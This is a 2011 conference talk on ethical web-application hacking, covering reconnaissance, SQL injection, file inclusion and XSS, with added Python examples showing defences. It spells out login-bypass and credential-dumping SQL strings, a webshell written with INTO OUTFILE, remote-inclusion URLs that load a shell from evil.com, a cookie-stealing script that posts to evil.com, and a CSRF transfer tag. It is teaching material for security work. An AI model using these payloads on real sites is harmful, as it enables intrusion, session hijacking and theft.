
OWASP DAY KL 2011, 20 September 2011

Introduction to Ethical Web Application Hacking


Syed Zainudeen

20 Sept 2011

Copyright (C) 2011, Syed Zainudeen.

Overview
- Information Gathering
- SQL Injection
- File Inclusion
- XSS (Cross Site Scripting)

Information Gathering

Finding an apple in a basket will be like finding a needle in a haystack if you don't know what an apple is!
- Syed Zainudeen -

Why do we need to know the target?


- Speed up the process of finding vulnerabilities
- Increase the chance of a successful exploitation

What do we want to know?


- Address of our target
- OS type
- Running services
- What type of service software
- Any info on the target

Tools to check IP address


- ping (?)
- nslookup
- host
- dig

Tools for OS fingerprinting


nmap
Usage: nmap -O <host>
e.g. nmap -O www.website.com

xprobe2
Usage: xprobe2 <host>
e.g. xprobe2 www.website.com

Why do we need to know the OS?


Let's say that we found a vulnerability in a system that allows us to execute commands on the remote OS. We send the command: net user hacker 123456 /add. However, we scratch our heads wondering why the command didn't work. It WON'T work if the target is a Linux machine.

nmap in action

Tools to scan for services


nmap
TCP Connect scan: nmap -sT <host>
e.g. nmap -sT www.website.com

SYN scan: nmap -sS <host>
e.g. nmap -sS www.website.com

UDP scan: nmap -sU <host>
e.g. nmap -sU www.website.com

amap (discovering services on nonstandard ports)
Usage: amap <host> <port>
e.g. amap www.website.com 49152

Service software detection tools


Automated:
nmap -sV <host>
e.g. nmap -sV www.website.com

Manual:
nc / telnet / PuTTY (text-based services)
Usage: nc <host> <port>

openssl (text-based services + SSL)
Usage: openssl s_client -connect <host>:<port>

HTTP banner grabbing


Example:

Using netcat:
nc www.google.com 80
HEAD / HTTP/1.0
Host: www.google.com
(then press Enter twice: the empty line ends the request)

Using telnet:
telnet www.website.com 80
HEAD / HTTP/1.0
Host: www.website.com
(then press Enter twice)
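
The request above built and the reply parsed in Python, as an added example (not from the slides): head_request() produces the exact bytes typed into nc/telnet, and parse_banner() pulls the software-revealing headers out of a constructed response (the header values are made up, not captured from any real host).

```python
import re
from io import BytesIO
from http.client import parse_headers


def head_request(host, path="/"):
    """The exact bytes the slide types into nc/telnet: request line, Host, blank line."""
    return ("HEAD %s HTTP/1.0\r\nHost: %s\r\n\r\n" % (path, host)).encode()


# Constructed reply; header values are made up, not captured from any host.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Date: Tue, 20 Sep 2011 09:00:00 GMT\r\n"
    b"Server: Apache/2.2.17 (Win32) PHP/5.3.5\r\n"
    b"X-Powered-By: PHP/5.3.5\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
)


def parse_banner(raw):
    """Split the status line off; return it with the software-revealing headers."""
    status, _, rest = raw.partition(b"\r\n")
    headers = parse_headers(BytesIO(rest))
    leaks = {k: headers[k] for k in ("Server", "X-Powered-By") if headers[k]}
    return status.decode(), leaks


def version_disclosed(leaks):
    """True when a banner header carries a version number (digits after a '/')."""
    return any(re.search(r"/\d", v) for v in leaks.values())


if __name__ == "__main__":
    print(head_request("www.google.com").decode())
    status, leaks = parse_banner(SAMPLE_RESPONSE)
    print(status, leaks, "version disclosed:", version_disclosed(leaks))
```

On the defending side the same check tells you whether your own server still advertises exact versions in its banner.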

HTTP banner grabbing demo

Additional ways to get information


- Google
- Spidering
- Error messages

SQL Injection

SQL injection is like asking for an extra plate/tissue/etc. when all the waiter is expecting is your order.
- Syed Zainudeen -

What is SQL injection?


SQL injection: inserting specially crafted SQL instructions for arbitrary SQL code execution.
Example: inserting ' OR 1=1 # to bypass a login page

Login bypass

Logged in as admin!

How did it work?


Behind the scenes, there is an SQL instruction being executed:
SELECT * FROM accounts WHERE username='$user' AND password='$pass'
$user and $pass are taken from the input boxes.

How did it work? (injection)


SELECT * FROM accounts WHERE username='$user' AND password='$pass'
If $user equals ' OR 1=1 # and $pass is empty, then the SQL instruction becomes:
SELECT * FROM accounts WHERE username='' OR 1=1 #' AND password=''

How did it work? (comment)


# is a special character in MySQL which means line comment (similar to // in C); anything that follows it will be ignored.

With the commented-out part shown, the SQL is: SELECT * FROM accounts WHERE username='' OR 1=1 #' AND password=''
Everything from # onwards is ignored by MySQL.

How did it work? (comparison)


SELECT * FROM accounts WHERE username='' OR 1=1
1=1 is a comparison that will result in a boolean value of TRUE (since 1 is always equal to 1).
The OR operator means that only one of the two conditions needs to be true.

How did it work? (Boolean logic)


Therefore: SELECT * FROM accounts WHERE username='' OR 1=1

Truth table for OR:

Condition         Result
FALSE or FALSE    FALSE
FALSE or TRUE     TRUE
TRUE or TRUE      TRUE
TRUE or FALSE     TRUE

Boolean: (anything) OR TRUE
Means: (anything) OR TRUE equals TRUE

How did it work? (eureka!)


Therefore the condition will always be true and this will be executed:
SELECT * FROM accounts WHERE username='' OR 1=1

All the rows will be returned, but since the first row is the username admin, we log in as admin.

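The login bypass worked through above, replayed against an in-memory SQLite database as an added example that is not part of the deck: the string-built query behaves exactly as the slides describe, while the parameterised version binds the same input as data. SQLite has no # line comment, so the -- variant of the payload listed later in the deck is used; the accounts rows are constructed.

```python
import sqlite3

# Constructed sample rows standing in for the deck's "accounts" table;
# the admin row comes first, as on the slides.
ACCOUNTS = [("admin", "s3cret"), ("ali", "hunter2")]


def make_db():
    """In-memory SQLite database holding the constructed accounts table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE accounts (username TEXT, password TEXT)")
    db.executemany("INSERT INTO accounts VALUES (?, ?)", ACCOUNTS)
    return db


def login_vulnerable(db, user, pw):
    """String-built query: the input becomes part of the SQL text itself."""
    sql = ("SELECT username FROM accounts WHERE username='" + user +
           "' AND password='" + pw + "'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(db, user, pw):
    """Parameterised query: the input is bound as data, never parsed as SQL."""
    sql = "SELECT username FROM accounts WHERE username=? AND password=?"
    row = db.execute(sql, (user, pw)).fetchone()
    return row[0] if row else None


def single_quote_test(db):
    """The deck's single-quote probe: a lone ' breaks the string-built query."""
    try:
        login_vulnerable(db, "'", "")
        return "no error"
    except sqlite3.OperationalError as err:
        return "error: " + str(err)


def demo():
    db = make_db()
    payload = "' OR 1=1 --"   # SQLite has no '#' comment; '--' plays the same role
    return {
        "vuln_bypass": login_vulnerable(db, payload, ""),  # first row: 'admin'
        "safe_bypass": login_safe(db, payload, ""),        # None: no such user
        "safe_real": login_safe(db, "ali", "hunter2"),     # 'ali'
        "quote_probe": single_quote_test(db),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```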
Exploits of a Mom

xkcd.com/327

Spotting a vulnerable application


The easiest way to find an SQL injection vuln is by inserting a single quote ( ' ). An error message will be displayed (if the server is configured to display errors). Other possible responses might be:
- a blank page
- a web page with some of the elements missing

The single quote test

Exploiting SQL injection vuln


3 rules of a successful exploitation:
Rule 1: There is no master SQL injection string!
Rule 2: Think as a developer!
Rule 3: Try, try and try!

BTW, the rules won't help if you are facing a secure web application

Exploitation: Bypassing login page


Common login bypass strings:

' OR 1=1 #
' OR 1=1 -- '
' OR ''='
' OR 1=1 OR '
' OR 1=1 LIMIT 1#
... use your imagination (and logic)

Exploitation example: Login bypass

What can be done with SQLi?


- Bypass login page (done!)
- Displaying private data
- Install a webshell

Displaying private data


DONE using UNION <SQL query> #comment
' union select group_concat(<columns>),2,3 from <table name> #

Examples:

' union select group_concat(user,password),2,3 from users#
' union select group_concat(user,':',password),2,3 from users#

Pwned!

Installing a webshell
This is done using SELECT ... INTO OUTFILE. If we were attacking a XAMPP installation:

' union select '<?php system($_GET[c]); ?>',2,3 into outfile 'c:/xampp/htdocs/test.php' #

Note: system() is a special PHP function that executes system commands.
File permission (the MySQL FILE privilege) is required in order to use INTO OUTFILE.

Pwned!!!
We access the shell through: http://<host>/test.php?c=<OS command>

File Inclusion Attack

File injection is akin to how a bacteriophage injects a bacterium with its genetic material.
- Syed Zainudeen -

File inclusion in web applications


Sometimes web application developers code their application as separate modules in multiple files. When needed, these modules can simply be included into the web app. In PHP this is done using include(), include_once(), require() or require_once().

Sample URL pattern


Sample URL patterns that might use include():
http://website.com/?page=login.php
http://website.com/?page=register.php
http://website.com/?page=main.php

The site is most probably coded like this:

<?php $page = $_GET['page']; include($page); ?>

include()
include() and other similar functions have the ability to include any file as part of the script that is currently executing.

Depending on the server configuration, include() can access not just local file paths but also web URLs.

Sample attack
What if an attacker prepares a webshell script <?php system($_GET[c]); ?> and hosts it at http://evil.com/script.txt?

All the attacker needs to do now is invoke the web application with this URL:
http://website.com/?page=http://evil.com/script.txt&c=ls

Spotting a vulnerable app


All we have to do is prepend ../ to the suspected variables (GET/POST/injected variables).
Example: http://abc.com/?page=../register.php
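
A page-parameter check that refuses both the ../ probe above and the URL form from the earlier "Sample attack" slide, as an added example (not the deck's code): the WEB_ROOT path and the allow-list of page names are assumptions taken from the deck's sample URLs.

```python
import os
from urllib.parse import urlsplit

# Assumed web root and the page names from the deck's sample URLs
# (constructed; both would be set for the real deployment).
WEB_ROOT = "/var/www/site/pages"
ALLOWED_PAGES = {"login.php", "register.php", "main.php"}


def classify(param):
    """Label a ?page= value for logging: rfi / lfi / ok / unknown-page."""
    if urlsplit(param).scheme:                       # http://evil.com/script.txt
        return "rfi"
    if param.startswith("/") or ".." in param.replace("\\", "/").split("/"):
        return "lfi"                                 # ../register.php, /etc/passwd
    return "ok" if param in ALLOWED_PAGES else "unknown-page"


def resolve_page(param):
    """Return the file to include for ?page=..., or None if it must be refused.

    Two independent checks, so a mistake in one does not open the door:
      1. the value must be one of the known page names (no URLs, no paths)
      2. the resolved path must still sit under WEB_ROOT after normalisation
    """
    if param not in ALLOWED_PAGES:
        return None
    root = os.path.normpath(WEB_ROOT)
    full = os.path.normpath(os.path.join(root, param))
    if os.path.commonpath([root, full]) != root:
        return None
    return full


if __name__ == "__main__":
    for value in ("login.php", "../register.php", "http://evil.com/script.txt"):
        print(value, "->", classify(value), resolve_page(value))
```

classify() is what you would log and alert on; resolve_page() is the only thing the include() call should ever receive.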

Possible target of File Inclusion attack

Dot dot slash test in action

Types of File Inclusion Attack


There are 2 types of File Inclusion attack:
- Remote File Inclusion (RFI): easy to exploit (very, very dangerous!!!)
- Local File Inclusion (LFI): harder to inject code

RFI exploitation
1. Find a vulnerable URL
(e.g. http://192.168.0.1/web/index.php?page=login.php)

2. Host our script on a web server (e.g. http://evil.com/shell.txt)

3. Exploit it (run our script) by requesting
http://192.168.0.1/web/index.php?page=http://evil.com/shell.txt

RFI exploitation (cont.)


Content of shell.txt:
<?php system($_GET[c]); ?>

In order to execute the dir command, we can request the following URL:
http://192.168.0.1/web/index.php?page=http://evil.com/shell.txt&c=dir

PWNED !!!

The LFI dilemma


If an RFI attack fails, we can opt for LFI. But one big question remains:

HOW DO WE GET OUR MALICIOUS SCRIPT TO THE SERVER IN THE FIRST PLACE?

Getting your script to the server


There are several ways to get your script to the server:
- File/Image upload
- /proc/self/environ method
- Log file poisoning

Once the script is accessible locally by the server, exploitation can proceed.

Cross Site Scripting (XSS)

XSS, malicious content by user, for user


- Syed Zainudeen -

What is XSS?
XSS is a vulnerability that allows an attacker to inject client-side code into a webpage. The client-side code can be in any client-side language: JavaScript, CSS, HTML, etc.

How can it happen?


An attacker inserts a specially crafted input string that the browser interprets as valid code.

Example:
What's your name: Ali<script>alert('XSS')</script>

XSS in action

Types of XSS
There are 2 types of XSS:
- Reflected XSS (non-persistent)
- Stored XSS (persistent)

Reflected vs Stored
In a reflected XSS, the injected string is used only once and discarded (not stored).
E.g. a search function

In a stored XSS, the injected string is first stored in a DB and later loaded for display.
E.g. forum, guestbook, log

Reflected XSS
The vulnerable page will only display the user-injected script if he/she follows a certain link/URL.

The malicious script is visible in the URL (might be in encoded form). For example: http://abc.com/search?q=ball<script>alert(/XSS/)</script>
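
The reflected case above worked through in Python, as an added example (not from the slides): the search term is pulled out of the deck's URL and rendered twice, unescaped and HTML-escaped, so the difference the browser would see is visible. The page template is constructed.

```python
import html
from urllib.parse import parse_qs, urlsplit

# The reflected-XSS URL from the slide (constructed request, no real host).
REQUEST_URL = "http://abc.com/search?q=ball<script>alert(/XSS/)</script>"


def query_param(url, name):
    """First value of one query-string parameter, or '' if it is absent."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_vulnerable(q):
    """Echoes the search term straight into the markup: reflected XSS."""
    return "<p>Results for: " + q + "</p>"


def render_safe(q):
    """Same page, but the term is HTML-escaped (quotes included) before it
    reaches the markup, so the browser shows the tags as text."""
    return "<p>Results for: " + html.escape(q, quote=True) + "</p>"


def contains_script_tag(page):
    """Crude tester's check: did a raw <script tag survive into the output?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    term = query_param(REQUEST_URL, "q")
    print(render_vulnerable(term))   # the browser would execute the script
    print(render_safe(term))         # the browser displays it literally
```

html.escape is the right tool only for text placed in an HTML element body; attribute, URL and JavaScript contexts each need their own encoding.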

Reflected XSS in action

Stored XSS
The vulnerable page will display the user-injected script just by visiting the vulnerable site (that has been injected).

The malicious script is not visible in the URL (since it is usually loaded from the DB).

Stored XSS in action

What can we do with XSS?


There's a lot that can be done with an XSS vuln:
- Webpage defacement (?)
- Cross Site Request Forgery (CSRF)
- Cookie stealing

Webpage defacement
This is effective with stored XSS. It creates an illusion of being hacked! (Not a real hack.) The way to deface is up to the creativity of the attacker. Some examples:
<script>document.body.innerHTML="Hacked!"</script>
<iframe src="http://www.google.com" style="position:absolute; top:0; left:0; width:100%; height:100%"></iframe>

XSS web defacement (script)

XSS web defacement (iframe)

Cross Site Request Forgery (CSRF)


CSRF is a type of attack that enables an attacker to do things on behalf of the victim by using the trust that a webpage has in the victim.
How: The attacker sends instructions to a victim, to be executed (by the victim) using the session information of the victim.

CSRF explained
Let's say that a user is logged in to a bank (Low Security Bank, lsbank.com). The user then browses to another site that contains the following (XSS injected) code:
<img src="http://lsbank.com/transfer?amount=1000&to=hacker_acc&submit=true" />

CSRF explained (cont.)


The img tag will cause a GET request to the bank (lsbank.com). Since the user is currently logged in to the bank, he/she will unknowingly transfer $1000 to hacker_acc.
XSS + unsecured site = dangerous combination
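A server-side check that turns the lsbank.com transfer into a request the forged img tag above cannot make, as an added example (not the deck's code): money moves only on POST, and the form must carry a per-session token computed with an HMAC. The server secret, the form fields and the session ID (reused from the deck's later diagram) are constructed.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

SERVER_SECRET = secrets.token_bytes(32)   # constructed; one per server, kept private
SESSION_ID = "i45h0t3w4h"                  # the session ID from the deck's diagrams

# What the deck's <img src=...> tag actually requests (constructed).
FORGED_URL = "http://lsbank.com/transfer?amount=1000&to=hacker_acc&submit=true"


def csrf_token(session_id):
    """Token bound to the session; a page on another site cannot compute it."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def handle_transfer(method, session_id, form):
    """Decide whether a transfer request is genuine or forged.

    Rule 1: money moves only on POST; an <img> tag can only issue a GET.
    Rule 2: the submitted csrf_token must match the one bound to the session.
    """
    if method != "POST":
        return "rejected: state change via GET"
    if not hmac.compare_digest(form.get("csrf_token", ""), csrf_token(session_id)):
        return "rejected: bad or missing CSRF token"
    return "ok: transfer %s to %s" % (form["amount"], form["to"])


def query_to_form(url):
    """Flatten a URL's query string into the fields a form post would carry."""
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}


def forged_request():
    """The img-tag request: a GET carrying the session cookie but no token."""
    return handle_transfer("GET", SESSION_ID, query_to_form(FORGED_URL))


def forged_post_without_token():
    """The same fields submitted as a POST still fail: the token is absent."""
    return handle_transfer("POST", SESSION_ID, query_to_form(FORGED_URL))


def genuine_request():
    """The bank's own form includes the token it rendered for this session."""
    form = {"amount": "50", "to": "rent", "csrf_token": csrf_token(SESSION_ID)}
    return handle_transfer("POST", SESSION_ID, form)
```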

Cookie stealing
In CSRF, an attacker issues a command that gets executed using the session information (cookie) of a victim.

The cookie is not captured in CSRF; the attacker doesn't know the victim's cookie.
But using XSS, we can steal the user's cookie.

Why is the cookie important?


When we log in to a website, the only way that the site knows who we are is based on the cookie information that our browser sends.

If an attacker is able to steal cookie data from a victim, the attacker can basically do anything as the victim.

Limitation of XSS cookie stealing


XSS can be used to steal cookies, but it has a limitation: XSS can only be used to steal the user's cookie for the site that is vulnerable to XSS. Let's say that facebook.com has an XSS vuln; an attacker can then steal a user's cookie for facebook.com and use it to log in as the victim.

How to read the cookie value?


JavaScript can be used to read the user's cookie. We can view cookie data by using: alert(document.cookie);
document.cookie is a JavaScript variable that exposes all non-HttpOnly cookies.
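What document.cookie would expose for two cookie policies, as an added example (not from the slides): the Set-Cookie headers are constructed, reusing the session ID from the deck's later diagram, and audit() reports the flags a reviewer expects on a session cookie.

```python
from http.cookies import SimpleCookie

# Constructed Set-Cookie headers; the session ID is the one from the deck's
# later diagrams. WEAK is how the deck's vulnerable site behaves, HARDENED
# is the same site with the session cookie flagged.
WEAK = ["SESSIONID=i45h0t3w4h; Path=/", "theme=dark; Path=/"]
HARDENED = ["SESSIONID=i45h0t3w4h; Path=/; HttpOnly; Secure", "theme=dark; Path=/"]


def parse_set_cookie(header):
    """Return (name, value, flags) for one Set-Cookie header."""
    jar = SimpleCookie()
    jar.load(header)
    name, morsel = next(iter(jar.items()))
    flags = {"httponly": bool(morsel["httponly"]), "secure": bool(morsel["secure"])}
    return name, morsel.value, flags


def visible_to_document_cookie(headers):
    """What the deck's alert(document.cookie) would show: only cookies set
    without HttpOnly are readable by script running in the page."""
    exposed = {}
    for header in headers:
        name, value, flags = parse_set_cookie(header)
        if not flags["httponly"]:
            exposed[name] = value
    return exposed


def audit(header):
    """Findings a reviewer would raise for a session cookie header."""
    name, _, flags = parse_set_cookie(header)
    findings = []
    if not flags["httponly"]:
        findings.append(name + ": missing HttpOnly (readable via document.cookie)")
    if not flags["secure"]:
        findings.append(name + ": missing Secure (also sent over plain HTTP)")
    return findings


if __name__ == "__main__":
    print("weak site exposes:", visible_to_document_cookie(WEAK))
    print("hardened site exposes:", visible_to_document_cookie(HARDENED))
    for finding in audit(WEAK[0]):
        print("finding:", finding)
```

HttpOnly stops the cookie-stealing script on the next slide from reading the session ID, but not the CSRF and defacement cases, which never need to read it.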

Displaying user cookie

XSS cookie stealing


An attacker can steal the user's cookie by using:
<script> document.write('<img src="http://evil.com/?dat=' + escape(document.cookie) + '" />'); </script>

This script will cause the user's cookie to be sent to evil.com. The attacker can log the cookies using any server-side scripting language at evil.com.

Modifying browser cookie


The stolen cookies can then be retrieved and injected into the attacker's web browser. There are many ways to modify a browser's cookie:
- Manually: JavaScript injection at the address bar
- Using automated tools: Firecookie browser extension, TamperData, Paros proxy, etc.

Browsing with stolen cookie


Once the victim's cookie has been planted, all that needs to be done is to point the browser at the target site. The attacker's browser will present the stolen cookie to the web server and, possibly, the web server will identify the request as coming from the victim.

The attacker has just hijacked the victim's session using XSS!

How session hijacking works


[Diagram: Web Admin (cookie SESSIONID=i45h0t3w4h) and Normal User, each talking to the Web server]

Each user has a unique session ID stored in their browser's cookie. The web server uses the session ID to differentiate between the normal user and the web admin.

How session hijacking works (cont.)


[Diagram: Web Admin (cookie SESSIONID=i45h0t3w4h) talking to the Web server; the same SESSIONID=i45h0t3w4h is sent on to Evil.com, where the Attacker collects it]

Due to an XSS vulnerability in the web server, an attacker has injected some JavaScript code that steals visitors' session IDs.

How session hijacking works (cont.)


[Diagram: Attacker presents SESSIONID=i45h0t3w4h to the Web server, which treats the Attacker as the Web Admin]

The attacker then uses the stolen session ID to communicate with the web server. The attacker will be treated as the Web Admin and can do whatever the Web Admin can, since he/she has the session ID of the Web Admin.

Thank you!
